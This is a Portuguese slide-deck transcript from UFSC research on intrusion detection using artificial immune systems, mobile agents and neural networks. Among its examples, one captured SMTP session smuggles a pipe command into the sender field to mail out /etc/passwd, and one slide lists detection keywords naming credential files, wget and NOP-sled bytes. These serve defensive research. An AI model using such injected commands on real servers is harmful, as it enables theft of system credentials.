linha de pesquisa em segurança de redes

63
Linha de Pesquisa em Segurança de Redes Igor Vinícius Mussoi de Lima Renato Bobsin Machado Orientadores: João Bosco Mangueira Sobral Kathia Lemos Jucá UFSC

Upload: zona

Post on 11-Jan-2016

29 views

Category:

Documents


0 download

DESCRIPTION

UFSC. Linha de Pesquisa em Segurança de Redes. Igor Vinícius Mussoi de Lima Renato Bobsin Machado Orientadores: João Bosco Mangueira Sobral Kathia Lemos Jucá. Roteiro. Conceitos de Segurança Sistemas de Detecção de Intrusão Abordagem Baseada em Imunologia Computacional e Agentes Móveis - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Linha de Pesquisa em Segurança de Redes

Linha de Pesquisa em Segurança de Redes

Igor Vinícius Mussoi de LimaRenato Bobsin Machado

Orientadores:

João Bosco Mangueira SobralKathia Lemos Jucá

UFSC

Page 2: Linha de Pesquisa em Segurança de Redes

Roteiro Conceitos de Segurança Sistemas de Detecção de Intrusão Abordagem Baseada em Imunologia

Computacional e Agentes Móveis Abordagem Baseada em Redes

Neurais Artificiais

Page 3: Linha de Pesquisa em Segurança de Redes

Segurança de Redes

Evolução Tecnológica Importância das Redes Necessidade de Segurança

Page 4: Linha de Pesquisa em Segurança de Redes

Segurança de RedesIncidentes Reportados

Incidentes de Segurança Reportados (CERT)

2412 2573 2134 3734 985921756

52658

82094

137529

020000400006000080000

100000120000140000160000

1995 1996 1997 1998 1999 2000 2001 2002 2003

Ano

Inci

dent

es

Page 5: Linha de Pesquisa em Segurança de Redes

Segurança de RedesVulnerabilidades Reportadas

Vulnerabilidades Reportadas (CERT)

171 345 311 262 4171090

2437

41293784

0

1000

2000

3000

4000

5000

1995 1996 1997 1998 1999 2000 2001 2002 2003

Ano

Vuln

erab

ilida

des

Page 6: Linha de Pesquisa em Segurança de Redes

Ameaças a Segurança de Redes

F DFonte de

InformaçãoDestino daInformação

Fluxo Normal

F D

Interrupção

F D

IntercepçãoI

F D

Modificação

M

F D

Fabricação

F

Page 7: Linha de Pesquisa em Segurança de Redes

Classes de Ataques Sondagem

– Descoberta de Vulnerabilidades– Ferramentas de Scanners

Comprometimento de Serviços– Deny of Services (DoS e DDoS)– Exploração de Falhas– Inundação

Page 8: Linha de Pesquisa em Segurança de Redes

Classes de Ataques Intrusão

– Aquisição de Privilégios, Recursos, Dados– Controle do Sistema

Ataques ao Host– Falhas em Programas Executanto

Ataques a Rede– Vulnerabilidades dos Protocolos e Serviços

Page 9: Linha de Pesquisa em Segurança de Redes

Detecção de Intrusão Estabelecimento da Política de

Segurança Identificação de Ações Ilícitas Sistemas de Detecção de Intrusão

– Automatização– Necessidade de Métodos Eficazes– Pesquisas na Área

Page 10: Linha de Pesquisa em Segurança de Redes

Padronização de IDS

Geradores de Eventos Analisadores de Eventos Armazenamento Respostas

Page 11: Linha de Pesquisa em Segurança de Redes

Padronização de IDS (CIDF)

Contra Medidas

C-BOX

Analise

A-BOX

Eventos

E-BOX

Armazenamento

D-BOX

Page 12: Linha de Pesquisa em Segurança de Redes

Padronização de IDS (IDWG)

Page 13: Linha de Pesquisa em Segurança de Redes

Classificação de IDS’s

Page 14: Linha de Pesquisa em Segurança de Redes

Classificação de IDSs Baseado em Comportamento (Anomalia)

– Estabelecimento de Conjuntos de Atividades– Identifica Ataques Desconhecidos– Técnicas Computacionais Aplicadas– Classes de Eventos Gerados:

• Falsos Positivos• Falsos Negativos• Verdadeiro Negativo• Verdadeiro Positivo

Page 15: Linha de Pesquisa em Segurança de Redes

Classificação de IDSs Baseado em Conhecimento (Assinaturas)

– Conjunto Conhecido e Pré-definido– Ineficaz para Novos Tipos de Ataque– Baixos Índices de Falsos Positivos e Falsos

Negativos Arquitetura Baseada em Host, Rede e

Híbrido Arquitetura Centralizada, Hierárquica e

Distribuída Comportamento e Freqüência

Page 16: Linha de Pesquisa em Segurança de Redes

Abordagem Baseada em Imunologia Computacional e Agentes Móveis

Page 17: Linha de Pesquisa em Segurança de Redes

Segurança de Redes/Sistemas Imunológicos Artificiais

Sistemas Imunológicos Artificiais Paralelos com o Problema da Segurança

em Rede Analogia estabelecida em 1987 (vírus de

computador) Conexão entre Imunologia e Segurança a

partir de 1994

Page 18: Linha de Pesquisa em Segurança de Redes

Segurança de Redes e Sistemas Imunológicos

Atualmente Aplica-se Princípios Sistema de Defesa do Corpo Humano

Principais Características:– Detecção por Anomalia– Plano de Respostas Especializado– Contra-ataque– Memorização e Adaptação

Page 19: Linha de Pesquisa em Segurança de Redes

Paradigma de Agentes Móveis

Conhec imento Conhec imento

Hos t H o s t

A gente A gente

R ede

F ig u ra 4 .3 - A rq u ite tu ra d e A g en te s M ó v e is

Page 20: Linha de Pesquisa em Segurança de Redes

Agentes Móveis

“Agentes itinerantes são programas que são despachados de um computador de origem, viajam entre servidores em uma rede até que se tornem hábeis para completar a sua tarefa; eles movem processos que progressivamente executam tarefas se movendo de um lugar para outro” (CHESS, 1995).

Page 21: Linha de Pesquisa em Segurança de Redes

Agentes Móveis Delegação Comunicação Mobilidade Ambientes de Execução Segurança Tolerância à Falhas Interoperabilidade.

Page 22: Linha de Pesquisa em Segurança de Redes

Agentes Móveis - MAF

Região Sistema de Agentes (Agências) Place Agente Codebase

Page 23: Linha de Pesquisa em Segurança de Redes

Agentes Móveis - MAF

Page 24: Linha de Pesquisa em Segurança de Redes

Um IDS Baseado em SIA e Agentes Móveis

Requisitos Implementados– Funções do Modelo CIDF– Método de Detecção por Anomalia– Arquitetura Distribuída e Baseada em Host– Funcionamento em Tempo Real– Geração de Respostas Ativas e Passivas

Page 25: Linha de Pesquisa em Segurança de Redes

Inspiração no Sistema Imunológico Humano

Page 26: Linha de Pesquisa em Segurança de Redes

Sistema Imunológico Artificial

Arquitetura Protegendo uma Rede Confiável de Computadores– Rede = Organismo– Servidor = Órgão– Processos Monitorados = Células

Page 27: Linha de Pesquisa em Segurança de Redes

Controle de Serviços de Rede

Controle de Acesso

Permissões de Arquivos

Sistema de Arquivos

Política de Segurança

Registro de Atividades

Monitoração de Registros

Paches e Atualizações

Sistema Computacional - AgentesMóveis

Barreira Químicas

SistemaImunológico Inato

SistemaImunológico

Adquirido

Pele e MucosasFirewall

Page 28: Linha de Pesquisa em Segurança de Redes

Propriedades Imunológicas Adotados

Detecção Diversidade Aprendizagem Tolerância

Page 29: Linha de Pesquisa em Segurança de Redes

Análise de DadosLOGCHECK

Arquivo Monitorado Tempo de Leitura Quantidade Máxima de Dados

Estático de Persitência

CA

NA

L S

SL

Mail paraAdministrador

Agente Móvel Reativo

Móvel de Persistência

Análise de DadosAtaque

FTP POP

SMTPHTTP

DNS

Ataque a Serviço

Parar ServiçoAtacado

Itinerário Conteúdo

Servidor Servidor

Estação deMonitoração

MYSQL

MYSQL

MYSQL

MYSQL

EstaçãoItinerário 1

EstaçãoItinerário 2

Estação -Itinerário n

SYSLOG-NGGerador de Logs

Agentes Estáticos deMonitoração

Agentes Móveis de Distribuição

Agentes Móveis de Distribuição

Agentes Móveis de Distribuição

Clonagem Clonagem Clonagem

Page 30: Linha de Pesquisa em Segurança de Redes

Serviços Monitorados

DNS, FTP, HTTP, POP3, SMTP (Células Expostas aos Antígenos)

Sat Feb 28 09:54:50 2004 0 200.195.169.253 51478 /home/eder/arc_5.21e-5_i386.deb b _ i r eder ftp 0 * cMay 23 06:37:42 orgao named[10247]: unrelated additional info 'prioritytravel.com' type A from [64.74.96.242].53[Thu Apr 22 10:41:15 2004] [error] [client 200.150.211.66] request failed: error reading the headersApr 10 00:23:13 email vpopmail[4660]: vchkpw: vpopmail user not found [email protected]:201.3.96.18

Page 31: Linha de Pesquisa em Segurança de Redes

Detecção e Análise

SYSLOG-NG - Detectores de Eventos (Macrófago)– Ambiente Distribuído

LOGCHECK – Analisador de Eventos (Célula T-Helper)– Logcheck.hacking– Logcheck.violations– Logcheck.violations.ignore– Logcheck.ignore

Page 32: Linha de Pesquisa em Segurança de Redes

Detecção e Análise

LOGCHECK – Analisador de Eventos (Célula T-Helper)– Atividades de Cracking– Violações de Segurança– Eventos de Segurança

Page 33: Linha de Pesquisa em Segurança de Redes

Sistemas de Agentes(Linfócitos)

Região - SIA

Agência de Origem Agências de Destino

Canal de Comunicação - SOCKET SSL

MYSQLMYSQL

Monitoração

DistribuiçãoPersitência Distribuição Reação

Reação

Agências de Destino

Page 34: Linha de Pesquisa em Segurança de Redes

Classes de Agentes

Monitoração (Células B) Distribuição (Células Plasma) Persistência (Robustez Imunológica) Reativos (Anticorpos) Banco de Dados (Memória

Imunológica)

Page 35: Linha de Pesquisa em Segurança de Redes

Performance dos Agentes

0.0

1.0

2.0

3.0

4.0

5.0

6.0

0 KB

200

KB

400

KB

600

KB

800

KB

1000

KB

1200

KB

1400

KB

1600

KB

1800

KB

2000

KB

Tamanhos (KB)

Tem

po

(S

eg

un

do

s)

10 Mbps 100 Mbps 1000 Mbps

Page 36: Linha de Pesquisa em Segurança de Redes

Configuração do Sistema

Page 37: Linha de Pesquisa em Segurança de Redes

Estudos de Caso

0

10000000

20000000

30000000

Oc

orr

ên

cia

s

Março Abril Maio Junho

Meses

Operações Normais e Anômalas - Provedor

Normais Anormais

0

2000000

4000000

6000000

8000000

10000000

Oc

orr

ên

cia

s

Março Abril Maio Junho

Meses

Operações Normais e Anômalas - Empresa

Normais Anormais

Page 38: Linha de Pesquisa em Segurança de Redes

Contribuições

Classificação dos eventos em normais e anormais

Redução do número de registros reportados: 91,40% no Provedor e 46,87%

Classificação dos Registros em Ataques, Violações e Eventos

Page 39: Linha de Pesquisa em Segurança de Redes

Contribuições

Positivos Verdadeiros: 19,18% no Provedor e 5,33% na empresa

Possibilidade de Realizar Estudos Estatísticos

Mecanismos de Reação Pró-Ativos Estudo da Relação

Segurança/Performance da Plataforma Grasshopper

Page 40: Linha de Pesquisa em Segurança de Redes

Considerações Finais

Contribuições da Área de Pesquisa Otimização de Performance Contribuições do Estudo de Caso Projetos Futuros

Page 41: Linha de Pesquisa em Segurança de Redes

Abordagem Baseada em Redes Neurais Artificiais

Page 42: Linha de Pesquisa em Segurança de Redes

Roteiro

Introdução Segurança de Redes

– Detecção de Intrusão Inteligência Artificial

– Reconhecimento de Padrões Modelo de um IDS Baseado em Redes

Neurais Artificiais.

Page 43: Linha de Pesquisa em Segurança de Redes

Segurança de Redes

Dificuldades de IDS

– Abuso ou Assinatura • Novos Ataques• Variações do mesmo ataque

– Anomalia• Altos índices de falsos positivos

Page 44: Linha de Pesquisa em Segurança de Redes

Inteligência Artificial

Inspiração Biológica– Aprendizado de Máquina– Conexionismo– Redes Neurais Artificiais

• Reconhecimento de Padrões• Generalização

Page 45: Linha de Pesquisa em Segurança de Redes

Treinamento

Page 46: Linha de Pesquisa em Segurança de Redes

Modelo Neural de Detecção de Intrusos

Page 47: Linha de Pesquisa em Segurança de Redes

Módulo de Captura Lib PCAP TCPDUMP / TCPFlow Estruturas na Memória e Geração de

Arquivos por host. BroadCast (Modo Promíscuo)

Page 48: Linha de Pesquisa em Segurança de Redes

Exemplo de Seção Capturada-------------------------------------------------------------------------------#####_I-IDS_#####TCP 10.1.1.4:32772 -> 200.195.169.61:25#####_I-IDS_#####:5:I-IDS<-220 [email protected] ESMTP Sendmail 8.7.5 readyI-IDS->mail from " | /bin/mail [email protected] < etc/passwd "I-IDS<-250 " | /bin/mail [email protected] < /etc/passwd ".I-IDS<-.. sender ok.I-IDS->rcpt tp: nobodyI-IDS<-250 Recipient ok.I-IDS<-354 Enter mail, end with "." on a line by itselfI-IDS->dataI-IDS<-250 QAA23003 Message accept for deliveryI-IDS->quitI-IDS<[email protected] closing connectionI-IDS:END-------------------------------------------------------------------------------

Page 49: Linha de Pesquisa em Segurança de Redes

Analisador Semântico

Autômato Finito Simples Busca por Padrões entre as strings

Page 50: Linha de Pesquisa em Segurança de Redes

Conversão de String p/ Binario

16 bits cada String Máximo de 16 Strings por seção Distância de Hamming Gerador de Binários

Page 51: Linha de Pesquisa em Segurança de Redes

Base de Conhecimento1 /etc/passwd2 /etc/shadow3 /etc/network/interfaces4 /etc/fstab5 rmdir6 wget7 Entering Passive Mode8 nobody9 command successful10 |ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff|11 |90 90 90 90 90 90 90 90 90|

1 00000110010010102 00000110011101013 00000111100011014 00000111101100105 00001010100101006 00001010101010117 00001011010100118 00001011011011009 000011001101111110 000011001110000011 0000110100011000

21 0000000011111110

23 0000111100001110

80 0000111111110001

53 0011001100110010

Page 52: Linha de Pesquisa em Segurança de Redes

Representação Intermediária #6:6 #TCP #25 #| mail #sleep 2 ; echo quit #Syntax Error #| mail #sleep 2 ; echo quit #Invalid sender address 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0 0 1 1 0 0 1 1 0 0 1 1 0 0 1 0 0 1 0 1 1 1 0 1 1 0 1 1 0 0 0 1 0 0 0 0 0 1 1 1 1 0 0 0 1 1 0 1 0 0 1 1 0 0 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 1 0 1 1 0 1 1 0 0 0 1 0 0 0 0 0 1 1 1 1 0 0 0 1 1 0 1 0 0 0 0 1 1 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Page 53: Linha de Pesquisa em Segurança de Redes

Pós Processamento

Transformação da representação intermediaria em

VETOR DE ESTIMULO

para a Rede Neural MLP-256-21-1

Page 54: Linha de Pesquisa em Segurança de Redes

Rede Neural

Simuladores de Redes Neurais Biblioteca (neuro.h)

MultiLayer Perceptron BackPropagation Função de ativação Tangente Hiperbólica Limiar de -1 a 1 256 – 21 – 1

Page 55: Linha de Pesquisa em Segurança de Redes

Análise Neural

Entrada– Representação Binária das seções suspeitas

Saída– Nível de Suspeita (entre –1 e 1)

Page 56: Linha de Pesquisa em Segurança de Redes

Definição de Padrões

Ataque– Ferramentas de Ataque e Exploração– Reprodução de Técnicas Documentadas– Padrões ACME / UNESP

Não Ataque– Monitoria de Atividades Normais– Simples Utilização de Serviços

Page 57: Linha de Pesquisa em Segurança de Redes

Experimentos

Page 58: Linha de Pesquisa em Segurança de Redes

Experimentos

Formação Aleatória

Page 59: Linha de Pesquisa em Segurança de Redes

Resultados

Acertos de 100% sobre os padrões usados durante o treinamento.

Acertos de ~= 75% sobre padrões não vistos durante o treinamento

Conjunto 1 : 24,52% de erro Conjunto 2 : 27,30% de erro

Page 60: Linha de Pesquisa em Segurança de Redes

Conclusões

Índices de Acertos Satisfatórios. Índice de Aceitação pode ser ajustado para

controlar– Falsos Positivos e Falsos Negativos

Problemas com Criptografia Problemas com Redes sem BroadCast

Page 61: Linha de Pesquisa em Segurança de Redes

Links Importantes

SIA:– http://www.dca.fee.unicamp.br/~lnunes– http://www.cs.kent.ac.uk/people/staff/jt6/aisbook/

ais-researchers.htm

– http://www.cs.unm.edu/~steveah/

– http://mcb.harvard.edu/BioLinks.html

Page 62: Linha de Pesquisa em Segurança de Redes

Links Importantes

Segurança de Redes/Detecção de Intrusão–

http://www-rnks.informatik.tu-cottbus.de/~sobirey/ids.html

– http://www.securitytechnet.com/security/ids-more.html

– http://www.cerias.purdue.edu/coast/coast-library.html

Page 63: Linha de Pesquisa em Segurança de Redes

Links Importantes

Agentes Móveis– http://www.cetus-links.org/oo_mobile_agents.html

– http://have.itgo.com/index.html

– http://www.agentland.com/Resources/9Research/Projects/more4.html